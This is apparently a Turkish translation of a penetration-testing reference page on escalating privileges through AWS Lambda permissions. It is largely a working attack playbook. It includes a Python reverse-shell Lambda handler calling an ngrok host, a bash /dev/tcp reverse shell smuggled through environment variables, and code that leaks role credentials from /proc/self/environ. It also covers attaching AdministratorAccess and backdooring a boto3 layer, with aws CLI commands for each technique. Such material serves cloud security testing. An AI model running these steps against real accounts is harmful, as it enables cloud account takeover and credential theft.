AWS - Lambda Privesc

lambda

lambda hakkında daha fazla bilgi için:

iam:PassRole, lambda:CreateFunction, (lambda:InvokeFunction | lambda:InvokeFunctionUrl)

iam:PassRole, lambda:CreateFunction ve lambda:InvokeFunction izinlerine sahip kullanıcılar, ayrıcalıklarını artırabilir. Yeni bir Lambda fonksiyonu oluşturabilir ve ona mevcut bir IAM rolü atayabilir, bu da fonksiyona o rolle ilişkili izinleri verir. Kullanıcı daha sonra bu Lambda fonksiyonuna kod yazabilir ve yükleyebilir (örneğin bir rev shell ile). Fonksiyon kurulduktan sonra, kullanıcı çalıştırılmasını tetikleyebilir ve Lambda fonksiyonunu AWS API'si aracılığıyla çağırarak istenen eylemleri gerçekleştirebilir. Bu yaklaşım, kullanıcının Lambda fonksiyonu aracılığıyla dolaylı olarak görevler gerçekleştirmesine olanak tanır ve buna bağlı IAM rolü ile verilen erişim seviyesinde çalışır.\

Bir saldırgan bunu rev shell almak ve token'ı çalmak için kötüye kullanabilir:

import socket,subprocess,os,time
def lambda_handler(event, context):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(('4.tcp.ngrok.io',14305))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/sh','-i'])
time.sleep(900)
return 0

# Zip the rev shell
zip "rev.zip" "rev.py"

# Create the function
aws lambda create-function --function-name my_function \
--runtime python3.9 --role <arn_of_lambda_role> \
--handler rev.lambda_handler --zip-file fileb://rev.zip

# Invoke the function
aws lambda invoke --function-name my_function output.txt
## If you have the lambda:InvokeFunctionUrl permission you need to expose the lambda inan URL and execute it via the URL

# List roles
aws iam list-attached-user-policies --user-name <user-name>

Lambda fonksiyonunun kendisinden lambda rol izinlerini kötüye kullanabilirsiniz. Eğer lambda rolü yeterli izinlere sahipse, bunu size yönetici hakları vermek için kullanabilirsiniz:

import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
return response

Lambda'nın rol kimlik bilgilerini dış bağlantıya ihtiyaç duymadan sızdırmak da mümkündür. Bu, iç görevlerde kullanılan Ağdan İzole Lambdalar için faydalı olacaktır. Eğer bilinmeyen güvenlik grupları ters shell'lerinizi filtreliyorsa, bu kod parçası, kimlik bilgilerini lambda'nın çıktısı olarak doğrudan sızdırmanıza olanak tanıyacaktır.

def handler(event, context):
sessiontoken = open('/proc/self/environ', "r").read()
return {
'statusCode': 200,
'session': str(sessiontoken)
}

aws lambda invoke --function-name <lambda_name> output.txt
cat output.txt

Olası Etki: Belirtilen keyfi lambda hizmet rolüne doğrudan privesc.

iam:PassRole, lambda:CreateFunction, lambda:AddPermission

Önceki senaryoda olduğu gibi, lambda:AddPermission iznine sahipseniz kendinize lambda:InvokeFunction iznini verebilirsiniz.

# Check the previous exploit and use the following line to grant you the invoke permissions
aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"

Potansiyel Etki: Belirtilen keyfi lambda hizmet rolüne doğrudan yetki yükseltme.

iam:PassRole, lambda:CreateFunction, lambda:CreateEventSourceMapping

iam:PassRole, lambda:CreateFunction ve lambda:CreateEventSourceMapping izinlerine sahip kullanıcılar (ve potansiyel olarak dynamodb:PutItem ve dynamodb:CreateTable) dolaylı olarak yetki yükseltebilirler; hatta lambda:InvokeFunction olmadan bile. Kötü niyetli kod içeren bir Lambda fonksiyonu oluşturabilir ve ona mevcut bir IAM rolü atayabilirler.

Kullanıcı, Lambda'yı doğrudan çağırmak yerine, mevcut bir DynamoDB tablosu kurar veya kullanır ve bunu bir olay kaynağı eşlemesi aracılığıyla Lambda ile bağlar. Bu kurulum, Lambda fonksiyonunun tablodaki yeni bir öğe girişi ile otomatik olarak tetiklenmesini sağlar; bu, kullanıcının eylemi veya başka bir süreç tarafından gerçekleşebilir ve böylece Lambda fonksiyonunu dolaylı olarak çağırarak kodu atanan IAM rolünün izinleriyle çalıştırır.

aws lambda create-function --function-name my_function \
--runtime python3.8 --role <arn_of_lambda_role> \
--handler lambda_function.lambda_handler \
--zip-file fileb://rev.zip

Eğer DynamoDB AWS ortamında zaten aktifse, kullanıcı sadece Lambda fonksiyonu için olay kaynağı eşlemesini oluşturması gerekir. Ancak, eğer DynamoDB kullanılmıyorsa, kullanıcı streaming etkinleştirilmiş yeni bir tablo oluşturmalıdır:

aws dynamodb create-table --table-name my_table \
--attribute-definitions AttributeName=Test,AttributeType=S \
--key-schema AttributeName=Test,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES

Artık Lambda fonksiyonunu DynamoDB tablosuna bağlamak için bir olay kaynağı eşlemesi oluşturmak mümkündür:

aws lambda create-event-source-mapping --function-name my_function \
--event-source-arn <arn_of_dynamodb_table_stream> \
--enabled --starting-position LATEST

DynamoDB akışına bağlı Lambda işlevi ile, saldırgan DynamoDB akışını etkinleştirerek Lambda'yı dolaylı olarak tetikleyebilir. Bu, DynamoDB tablosuna bir öğe ekleyerek gerçekleştirilebilir:

aws dynamodb put-item --table-name my_table \
--item Test={S="Random string"}

Olası Etki: Belirtilen lambda hizmet rolüne doğrudan yetki yükseltme.

lambda:AddPermission

Bu izne sahip bir saldırgan kendisine (veya başkalarına) herhangi bir izin verebilir (bu, kaynağa erişim sağlamak için kaynak tabanlı politikalar oluşturur):

# Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>

# Invoke the function
aws lambda invoke --function-name <func_name> /tmp/outout

Olası Etki: Kodu değiştirme ve çalıştırma izni vererek lambda hizmet rolüne doğrudan yetki yükseltme.

lambda:AddLayerVersionPermission

Bu izne sahip bir saldırgan kendisine (veya başkalarına) lambda:GetLayerVersion iznini verebilir. Katmana erişebilir ve güvenlik açıkları veya hassas bilgiler arayabilir.

# Give everyone the permission lambda:GetLayerVersion
aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion

Olası Etki: Hassas bilgilere potansiyel erişim.

lambda:UpdateFunctionCode

lambda:UpdateFunctionCode iznine sahip kullanıcılar, bir IAM rolüne bağlı mevcut bir Lambda fonksiyonunun kodunu değiştirme potansiyeline sahiptir. Saldırgan, IAM kimlik bilgilerini dışarı aktarmak için lambdanın kodunu değiştirebilir.

Saldırganın fonksiyonu doğrudan çağırma yeteneği olmasa da, eğer Lambda fonksiyonu önceden var ve çalışıyorsa, mevcut iş akışları veya olaylar aracılığıyla tetiklenmesi muhtemeldir, böylece değiştirilmiş kodun yürütülmesini dolaylı olarak kolaylaştırır.

# The zip should contain the lambda code (trick: Download the current one and add your code there)
aws lambda update-function-code --function-name target_function \
--zip-file fileb:///my/lambda/code/zipped.zip

# If you have invoke permissions:
aws lambda invoke --function-name my_function output.txt

# If not check if it's exposed in any URL or via an API gateway you could access

Olası Etki: Kullanılan lambda hizmet rolüne doğrudan yetki yükseltme.

lambda:UpdateFunctionConfiguration

Ortam değişkenleri aracılığıyla RCE

Bu izinlerle, Lambda'nın rastgele kod çalıştırmasına neden olacak ortam değişkenleri eklemek mümkündür. Örneğin, Python'da PYTHONWARNING ve BROWSER ortam değişkenlerini kötüye kullanarak bir Python sürecinin rastgele komutlar çalıştırması sağlanabilir:

aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"

Diğer betik dilleri için kullanabileceğiniz başka ortam değişkenleri vardır. Daha fazla bilgi için aşağıdaki bağlantıdaki betik dilleri alt bölümlerine bakın:

macOS Process Abuse | HackTricks

Lambda Katmanları ile RCE

Lambda Katmanları, kodunuzu lambda fonksiyonunuza dahil etmenizi sağlar, ancak ayrı olarak depolayarak, böylece fonksiyon kodu küçük kalabilir ve birden fazla fonksiyon kodu paylaşabilir.

Lambda içinde, python kodunun yüklendiği yolları aşağıdaki gibi bir fonksiyonla kontrol edebilirsiniz:

import json
import sys

def lambda_handler(event, context):
print(json.dumps(sys.path, indent=2))

Bunlar yerlerdir:

1. /var/task

2. /opt/python/lib/python3.7/site-packages

3. /opt/python

4. /var/runtime

5. /var/lang/lib/python37.zip

6. /var/lang/lib/python3.7

7. /var/lang/lib/python3.7/lib-dynload

8. /var/lang/lib/python3.7/site-packages

9. /opt/python/lib/python3.7/site-packages

10. /opt/python

Örneğin, boto3 kütüphanesi /var/runtime/boto3 (4. pozisyon) konumundan yüklenir.

Sömürü

lambda:UpdateFunctionConfiguration iznini kötüye kullanarak bir lambda fonksiyonuna yeni bir katman eklemek mümkündür. Rastgele kod çalıştırmak için bu katmanın lambda'nın içe aktaracağı bazı kütüphaneleri içermesi gerekir. Lambda'nın kodunu okuyabiliyorsanız, bunu kolayca bulabilirsiniz, ayrıca lambda'nın zaten bir katman kullanıyor olabileceğini ve bu katmanı indirebileceğinizi ve oraya kodu ekleyebileceğinizi unutmayın.

Örneğin, lambda'nın boto3 kütüphanesini kullandığını varsayalım, bu, kütüphanenin son sürümüyle yerel bir katman oluşturacaktır:

pip3 install -t ./lambda_layer boto3

You can open ./lambda_layer/boto3/__init__.py and global kodda arka kapıyı ekleyin (örneğin, kimlik bilgilerini dışa aktaran bir fonksiyon veya ters shell almak için).

Sonra, ./lambda_layer dizinini zipleyin ve yeni lambda katmanını kendi hesabınıza (veya kurbanın hesabına, ancak bunun için izinleriniz olmayabilir) yükleyin. Bir python klasörü oluşturmanız ve kütüphaneleri oraya koymanız gerektiğini unutmayın, böylece /opt/python/boto3'ü geçersiz kılabilirsiniz. Ayrıca, katmanın lambda tarafından kullanılan python sürümüyle uyumlu olması gerekir ve eğer bunu hesabınıza yüklüyorsanız, aynı bölgede olması gerekir:

aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"

Şimdi, yüklenen lambda katmanını herhangi bir hesap tarafından erişilebilir hale getirin:

aws lambda add-layer-version-permission --layer-name boto3 \
--version-number 1 --statement-id public \
--action lambda:GetLayerVersion --principal *

Ve lambda katmanını kurban lambda fonksiyonuna ekleyin:

aws lambda update-function-configuration \
--function-name <func-name> \
--layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
--timeout 300 #5min for rev shells

Sonraki adım, eğer yapabiliyorsak fonksiyonu kendimiz çağırmak ya da normal yollarla çağrılmasını beklemek olacaktır - bu daha güvenli bir yöntemdir.

Bu açığı istismar etmenin daha gizli bir yolu şurada bulunabilir:

Olası Etki: Kullanılan lambda hizmet rolüne doğrudan privesc.

iam:PassRole, lambda:CreateFunction, lambda:CreateFunctionUrlConfig, lambda:InvokeFunctionUrl

Belki bu izinlerle bir fonksiyon oluşturup URL'yi çağırarak çalıştırabilirsiniz... ama bunu test etmenin bir yolunu bulamadım, eğer bulursanız bana bildirin!

Lambda MitM

Bazı lambdalar, kullanıcılardan parametrelerde hassas bilgiler alacak. Eğer bunlardan birinde RCE elde ederseniz, diğer kullanıcıların gönderdiği bilgileri dışarı sızdırabilirsiniz, bunu kontrol edin:

Referanslar

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/